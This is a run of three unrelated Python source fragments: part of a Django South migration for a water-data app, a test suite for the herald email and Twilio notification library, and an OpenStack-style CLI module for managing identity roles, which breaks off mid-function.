('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('remote_id', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'ddsc_core', ['IdMapping'])
# Deleting field 'Timeseries.supplying_system'
db.delete_column(u'ddsc_core_timeseries', 'supplying_system_id')
def backwards(self, orm):
# Deleting model 'IdMapping'
db.delete_table(u'ddsc_core_idmapping')
# Adding field 'Timeseries.supplying_system'
db.add_column(u'ddsc_core_timeseries', 'supplying_system',
self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'timeseries', null=True, to=orm['auth.User'], blank=True),
keep_default=False)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'ddsc_core.compartment': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Compartment'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'numeric_code': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'})
},
u'ddsc_core.folder': {
'Meta': {'object_name': 'Folder'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.idmapping': {
'Meta': {'object_name': 'IdMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'remote_id': ('django.db.models.fields.IntegerField', [], {}),
'timeseries': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Timeseries']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
u'ddsc_core.location': {
'Meta': {'object_name': 'Location'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'geometry_precision': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'point_geometry': ('django.contrib.gis.db.models.fields.PointField', [], {'dim': '3', 'null': 'True', 'blank': 'True'}),
'real_geometry': ('django.contrib.gis.db.models.fields.GeometryField', [], {'dim': '3', 'null': 'True', 'blank': 'True'})
},
u'ddsc_core.locationgroup': {
'Meta': {'object_name': 'LocationGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'location_groups'", 'blank': 'True', 'to': u"orm['ddsc_core.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
u'ddsc_core.logicalgroup': {
'Meta': {'ordering': "[u'owner', u'name']", 'unique_together': "((u'owner', u'name'),)", 'object_name': 'LogicalGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']"})
},
u'ddsc_core.logicalgroupedge': {
'Meta': {'unique_together': "((u'child', u'parent'),)", 'object_name': 'LogicalGroupEdge'},
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'childs'", 'to': u"orm['ddsc_core.LogicalGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parents'", 'to': u"orm['ddsc_core.LogicalGroup']"})
},
u'ddsc_core.manufacturer': {
'Meta': {'object_name': 'Manufacturer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
u'ddsc_core.measuringdevice': {
'Meta': {'ordering': "[u'description']", 'object_name': 'MeasuringDevice'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.measuringmethod': {
'Meta': {'ordering': "[u'description']", 'object_name': 'MeasuringMethod'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '600', 'null': 'True'})
},
u'ddsc_core.parameter': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Parameter'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'cas_number': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sikb_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True'})
},
u'ddsc_core.processingmethod': {
'Meta': {'ordering': "[u'description']", 'object_name': 'ProcessingMethod'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.referenceframe': {
'Meta': {'ordering': "[u'description']", 'object_name': 'ReferenceFrame'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'ddsc_core.source': {
'Meta': {'unique_together': "((u'manufacturer', u'name'),)", 'object_name': 'Source'},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Manufacturer']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'source_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'})
},
u'ddsc_core.timeseries': {
'Meta': {'object_name': 'Timeseries'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'compartment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Compartment']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'timeseries'", 'symmetrical': 'False', 'to': "orm['lizard_security.DataSet']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'first_value_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_value_number': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'latest_value_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latest_value_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'timeseries'", 'null': 'True', 'to': u"orm['ddsc_core.Location']"}),
'measuring_device': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.MeasuringDevice']", 'null': 'True', 'blank': 'True'}),
'measuring_method': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.MeasuringMethod']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']"}),
'parameter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Parameter']"}),
'processing_method': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.ProcessingMethod']", 'null': 'True', 'blank': 'True'}),
'reference_frame': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.ReferenceFrame']", 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Source']"}),
'supplying_systems': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'through': u"orm['ddsc_core.IdMapping']", 'blank': 'True'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ddsc_core.Unit']"}),
'value_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'})
},
u'ddsc_core.timeseriesgroup': {
'Meta': {'object_name': 'TimeseriesGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'parameters': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['ddsc_core.Parameter']", 'symmetrical': 'False'}),
'sources': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['ddsc_core.Source']", 'symmetrical': 'False'})
},
u'ddsc_core.unit': {
'Meta': {'ordering': "[u'description']", 'object_name': 'Unit'},
'begin_date': ('django.db.models.fields.DateField', [], {}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
'conversion_factor': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'}),
'dimension': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'group': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'lizard_security.dataowner': {
'Meta': {'ordering': "['name']", 'object_name': 'DataOwner'},
'data_managers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'remarks': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'lizard_security.dataset': {
'Meta': {'ordering': "['owner', 'name']", 'unique_together': "(('owner', 'name'),)", 'object_name': 'DataSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataOwner']", 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['ddsc_core']
|
|
from datetime import timedelta
import jsonpickle
from django.core import mail
from django.core.files import File
from django.core.mail import EmailMultiAlternatives
from django.template import TemplateDoesNotExist
from django.test import TestCase, override_settings
from django.utils import timezone
from herald.base import (EmailNotification, NotificationBase,
TwilioTextNotification)
from herald.models import SentNotification
from mock import patch
from .notifications import MyNotification, MyNotificationAttachmentOpen
try:
# twilio version 6
from twilio.rest.api.v2010.account import MessageList
except ImportError:
# twillio version < 6
from twilio.rest.resources import Messages as MessageList
class BaseNotificationTests(TestCase):
def test_get_context_data(self):
self.assertDictEqual(
MyNotification().get_context_data(),
{'hello': 'world', 'base_url': 'http://example.com', 'subject': None}
)
def test_get_recipients(self):
self.assertRaises(NotImplementedError, NotificationBase().get_recipients)
def test_get_extra_data(self):
self.assertDictEqual(NotificationBase().get_extra_data(), {})
def test_get_sent_from(self):
self.assertRaises(NotImplementedError, NotificationBase().get_sent_from)
def test_get_subject(self):
self.assertIsNone(NotificationBase().get_subject())
def test_get_demo_args(self):
self.assertListEqual(NotificationBase.get_demo_args(), [])
def test_private_send(self):
self.assertRaises(NotImplementedError, NotificationBase()._send, [])
def test_get_attachments(self):
self.assertIsNone(NotificationBase().get_attachments())
def test_send(self):
with patch.object(MyNotification, 'resend') as mocked_resend:
MyNotification().send()
mocked_resend.assert_called_once()
obj = mocked_resend.call_args[0][0]
self.assertEqual(obj.recipients, 'test@test.com')
def test_send_no_text(self):
class DummyNotification(EmailNotification):
render_types = ['html']
to_emails = ['test@test.com']
with patch.object(DummyNotification, 'resend') as mocked_resend:
DummyNotification().send()
mocked_resend.assert_called_once()
obj = mocked_resend.call_args[0][0]
self.assertEqual(obj.recipients, 'test@test.com')
self.assertIsNone(obj.text_content)
def test_real_send(self):
MyNotification().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, ['test@test.com'])
def test_real_send_attachments(self):
MyNotification().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].attachments[0][1], 'Some Report Data')
def test_real_send_attachments_open(self):
MyNotificationAttachmentOpen().send()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].attachments[0][0], 'tests/python.jpeg')
self.assertEqual(mail.outbox[0].attachments[1][0], 'tests/python.jpeg')
def test_render_no_type(self):
class DummyNotification(NotificationBase):
pass
with self.assertRaises(AssertionError):
DummyNotification().render('text', {})
def test_render_invalid_template(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'does_not_exist'
self.assertIsNone(DummyNotification().render('text', {}))
@override_settings(DEBUG=True)
def test_render_invalid_template_debug(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'does_not_exist'
with self.assertRaises(TemplateDoesNotExist):
DummyNotification().render('text', {})
def test_render_invalid(self):
class DummyNotification(NotificationBase):
render_types = ['text']
template_name = 'hello_world'
self.assertEqual(DummyNotification().render('text', {}), 'Hello World')
def test_resend_error(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
mocked__send.side_effect = Exception
result = NotificationBase.resend(notification)
self.assertFalse(result)
def test_resend_error_raise(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
mocked__send.side_effect = Exception
self.assertRaises(Exception, NotificationBase.resend, notification, raise_exception=True)
def test_resend(self):
notification = SentNotification()
with patch.object(NotificationBase, '_send') as mocked__send:
result = NotificationBase.resend(notification)
self.assertTrue(result)
def test_get_verbose_name(self):
class TestNotification(EmailNotification):
pass
self.assertEqual(TestNotification.get_verbose_name(), 'Test Notification')
class TestNotification2(EmailNotification):
verbose_name = 'A verbose name'
self.assertEqual(TestNotification2.get_verbose_name(), 'A verbose name')
def test_get_encoded_attachments_none(self):
class TestNotification(EmailNotification):
attachments = []
self.assertJSONEqual(TestNotification()._get_encoded_attachments(), [])
def test_get_encoded_attachments_basic(self):
class TestNotification(EmailNotification):
attachments = [('Report.txt', 'raw_data', 'text/plain')]
self.assertJSONEqual(
TestNotification()._get_encoded_attachments(),
[{'py/tuple': ['Report.txt', 'raw_data', 'text/plain']}]
)
def test_get_encoded_attachments_file(self):
class TestNotification(EmailNotification):
attachments = [File(open('tests/python.jpeg', 'rb'))]
attachments = jsonpickle.loads(TestNotification()._get_encoded_attachments())
self.assertEqual(attachments[0][0], 'tests/python.jpeg')
self.assertEqual(attachments[0][2], 'image/jpeg')
def test_delete_notifications_no_setting(self):
# create a test notification from a long time ago
SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=52),
notification_class='MyNotification'
)
# create a test notification from recently
SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=10),
notification_class='MyNotification'
)
MyNotification().send()
# all three were not deleted because we didn't have a setting
self.assertEqual(SentNotification.objects.count(), 3)
@override_settings(HERALD_NOTIFICATION_RETENTION_TIME=timedelta(weeks=26))
def test_delete_notifications(self):
# create a test notification from a long time ago
n1 = SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=52),
notification_class='MyNotification'
)
# create a test notification from recently
n2 = SentNotification.objects.create(
recipients='test@test.com', date_sent=timezone.now() - timedelta(weeks=10),
notification_class='MyNotification'
)
MyNotification().send()
# the one from a year ago was deleted, but not the one from 10 weeks ago.
self.assertEqual(SentNotification.objects.count(), 2)
ids = SentNotification.objects.values_list('id', flat=True)
self.assertTrue(n2.id in ids)
self.assertFalse(n1.id in ids)
class EmailNotificationTests(TestCase):
def test_get_recipients(self):
self.assertListEqual(MyNotification().get_recipients(), ['test@test.com'])
def test_get_sent_from(self):
class TestNotification(EmailNotification):
from_email = 'bob@example.com'
self.assertEqual(TestNotification().get_sent_from(), 'bob@example.com')
def test_get_sent_from_default(self):
class TestNotification(EmailNotification):
from_email = None
with override_settings(DEFAULT_FROM_EMAIL='default@example.com'):
self.assertEqual(TestNotification().get_sent_from(), 'default@example.com')
def test_get_subject(self):
class TestNotification(EmailNotification):
subject = 'test subject'
self.assertEqual(TestNotification().get_subject(), 'test subject')
def test_get_extra_data_none(self):
self.assertDictEqual(EmailNotification().get_extra_data(), {})
def test_get_extra_data(self):
class TestNotification(EmailNotification):
bcc = 'bcc@test.com'
cc = 'cc@test.com'
headers = {'HEADER': 'test'}
reply_to = 'reply_to@test.com'
self.assertDictEqual(TestNotification().get_extra_data(), {
'bcc': 'bcc@test.com',
'cc': 'cc@test.com',
'headers': {'HEADER': 'test'},
'reply_to': 'reply_to@test.com',
})
@override_settings(HERALD_HTML2TEXT_ENABLED=True)
def test_render_html2text(self):
class TestNotificationHTML2Text(EmailNotification):
template_name = 'hello_world_html2text'
output = TestNotificationHTML2Text().render(render_type='text', context={})
self.assertEqual(output, '# Hello World\n\n')
# Also test with DEBUG on so TemplateDoesNotExist is thrown
with override_settings(DEBUG=True):
output = TestNotificationHTML2Text().render(render_type='text', context={})
self.assertEqual(output, '# Hello World\n\n')
def test_send_html_content(self):
class TestNotification(EmailNotification):
subject = 'test subject'
with patch.object(EmailMultiAlternatives, 'attach_alternative') as mocked_attach_alternative:
TestNotification._send([], text_content='Text')
mocked_attach_alternative.assert_not_called()
with patch.object(EmailMultiAlternatives, 'attach_alternative') as mocked_attach_alternative:
TestNotification._send([], html_content='Text')
mocked_attach_alternative.assert_called_once_with('Text', 'text/html')
class TwilioNotificationTests(TestCase):
def test_get_recipients(self):
class TestNotification(TwilioTextNotification):
to_number = '1231231234'
self.assertListEqual(TestNotification().get_recipients(), ['1231231234'])
def test_get_sent_from(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
self.assertEqual(TestNotification().get_sent_from(), '1231231234')
def test_get_sent_from_default(self):
class TestNotification(TwilioTextNotification):
from_number = None
with override_settings(TWILIO_DEFAULT_FROM_NUMBER='1231231234'):
self.assertEqual(TestNotification().get_sent_from(), '1231231234')
def test_get_sent_from_default_error(self):
class TestNotification(TwilioTextNotification):
from_number = None
self.assertRaisesMessage(
Exception,
'TWILIO_DEFAULT_FROM_NUMBER setting is required for sending a TwilioTextNotification',
TestNotification().get_sent_from
)
@override_settings(
TWILIO_ACCOUNT_SID='sid',
TWILIO_AUTH_TOKEN='token'
)
def test_send(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
to_number = '1231231234'
template_name = 'hello_world'
with patch.object(MessageList, 'create') as mocked_create:
TestNotification().send()
mocked_create.assert_called_once_with(
body='Hello World',
to='1231231234',
from_='1231231234'
)
@override_settings(
TWILIO_ACCOUNT_SID='sid',
TWILIO_AUTH_TOKEN='token'
)
def test_sending_to_multiple_numbers(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
template_name = 'hello_world'
def get_recipients(self):
return ['1234567890', '0987654321']
with patch.object(MessageList, 'create') as mocked_create:
notification = TestNotification()
notification.send()
self.assertEqual(mocked_create.call_count, 2)
for recipient in notification.get_recipients():
mocked_create.assert_any_call(
body='Hello World',
to=recipient,
from_=notification.get_sent_from()
)
def test_send_no_settings(self):
class TestNotification(TwilioTextNotification):
from_number = '1231231234'
to_number = '1231231234'
template_name = 'hello_world'
with self.assertRaisesMessage(Exception, 'TWILIO_ACCOUNT_SID and TWILIO_AUTH_TOKEN settings are required for '
'sending a TwilioTextNotification'):
TestNotification().send(raise_exception=True)
|
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Role action implementations"""
import six
import sys
from keystoneauth1 import exceptions as ks_exc
from eclcli.common import command
from eclcli.common import utils
from eclcli.i18n import _ # noqa
from eclcli.identity import common
def _add_identity_and_resource_options_to_parser(parser):
domain_or_project = parser.add_mutually_exclusive_group()
domain_or_project.add_argument(
'--domain',
metavar='<domain>',
help='Include <domain> (name or ID)',
)
domain_or_project.add_argument(
'--project',
metavar='<project>',
help='Include <project> (name or ID)',
)
user_or_group = parser.add_mutually_exclusive_group()
user_or_group.add_argument(
'--user',
metavar='<user>',
help='Include <user> (name or ID)',
)
user_or_group.add_argument(
'--group',
metavar='<group>',
help='Include <group> (name or ID)',
)
common.add_group_domain_option_to_parser(parser)
common.add_project_domain_option_to_parser(parser)
common.add_user_domain_option_to_parser(parser)
common.add_inherited_option_to_parser(parser)
def _process_identity_and_resource_options(parsed_args,
identity_client_manager):
kwargs = {}
if parsed_args.user and parsed_args.domain:
kwargs['user'] = common.find_user(
identity_client_manager,
parsed_args.user,
parsed_args.user_domain,
).id
kwargs['domain'] = common.find_domain(
identity_client_manager,
parsed_args.domain,
).id
elif parsed_args.user and parsed_args.project:
kwargs['user'] = common.find_user(
identity_client_manager,
parsed_args.user,
parsed_args.user_domain,
).id
kwargs['project'] = common.find_project(
identity_client_manager,
parsed_args.project,
parsed_args.project_domain,
).id
elif parsed_args.group and parsed_args.domain:
kwargs['group'] = common.find_group(
identity_client_manager,
parsed_args.group,
parsed_args.group_domain,
).id
kwargs['domain'] = common.find_domain(
identity_client_manager,
parsed_args.domain,
).id
elif parsed_args.group and parsed_args.project:
kwargs['group'] = common.find_group(
identity_client_manager,
parsed_args.group,
parsed_args.group_domain,
).id
kwargs['project'] = common.find_project(
identity_client_manager,
parsed_args.project,
parsed_args.project_domain,
).id
kwargs['os_inherit_extension_inherited'] = parsed_args.inherited
return kwargs
class AddRole(command.Command):
"""Adds a role to a user or group on a domain or project"""
def get_parser(self, prog_name):
parser = super(AddRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role to add to <user> (name or ID)',
)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if (not parsed_args.user and not parsed_args.domain
and not parsed_args.group and not parsed_args.project):
return
role = utils.find_resource(
identity_client.roles,
parsed_args.role,
)
kwargs = _process_identity_and_resource_options(
parsed_args, self.app.client_manager.identity)
if not kwargs:
sys.stderr.write("Role not added, incorrect set of arguments "
"provided. See ecl --help for more "
"details\n")
return
identity_client.roles.grant(role.id, **kwargs)
class CreateRole(command.ShowOne):
"""Create new role"""
def get_parser(self, prog_name):
parser = super(CreateRole, self).get_parser(prog_name)
parser.add_argument(
'name',
metavar='<role-name>',
help='New role name',
)
parser.add_argument(
'--or-show',
action='store_true',
help=_('Return existing role'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
try:
role = identity_client.roles.create(name=parsed_args.name)
except ks_exc.Conflict as e:
if parsed_args.or_show:
role = utils.find_resource(identity_client.roles,
parsed_args.name)
self.log.info('Returning existing role %s', role.name)
else:
raise e
role._info.pop('links')
return zip(*sorted(six.iteritems(role._info)))
class DeleteRole(command.Command):
"""Delete role(s)"""
def get_parser(self, prog_name):
parser = super(DeleteRole, self).get_parser(prog_name)
parser.add_argument(
'roles',
metavar='<role>',
nargs="+",
help='Role(s) to delete (name or ID)',
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
for role in parsed_args.roles:
role_obj = utils.find_resource(
identity_client.roles,
role,
)
identity_client.roles.delete(role_obj.id)
class ListRole(command.Lister):
"""List roles"""
def get_parser(self, prog_name):
parser = super(ListRole, self).get_parser(prog_name)
_add_identity_and_resource_options_to_parser(parser)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = common.find_user(
identity_client,
parsed_args.user,
parsed_args.user_domain,
)
elif parsed_args.group:
group = common.find_group(
identity_client,
parsed_args.group,
parsed_args.group_domain,
)
if parsed_args.domain:
domain = common.find_domain(
identity_client,
parsed_args.domain,
)
elif parsed_args.project:
project = common.find_project(
identity_client,
parsed_args.project,
parsed_args.project_domain,
)
# no user or group specified, list all roles in the system
if not parsed_args.user and not parsed_args.group:
columns = ('ID', 'Name')
data = identity_client.roles.list()
elif parsed_args.user and parsed_args.domain:
columns = ('ID', 'Name', 'Domain', 'User')
data = identity_client.roles.list(
user=user,
domain=domain,
os_inherit_extension_inherited=parsed_args.inherited
)
for user_role in data:
user_role.user = user.name
user_role.domain = domain.name
elif parsed_args.user and parsed_args.project:
columns = ('ID', 'Name', 'Project', 'User')
data = identity_client.roles.list(
user=user,
project=project,
os_inherit_extension_inherited=parsed_args.inherited
)
for user_role in data:
user_role.user = user.name
user_role.project = project.name
elif parsed_args.user:
columns = ('ID', 'Name')
data = identity_client.roles.list(
user=user,
domain='default',
os_inherit_extension_inherited=parsed_args.inherited
)
elif parsed_args.group and parsed_args.domain:
columns = ('ID', 'Name', 'Domain', 'Group')
data = identity_client.roles.list(
group=group,
domain=domain,
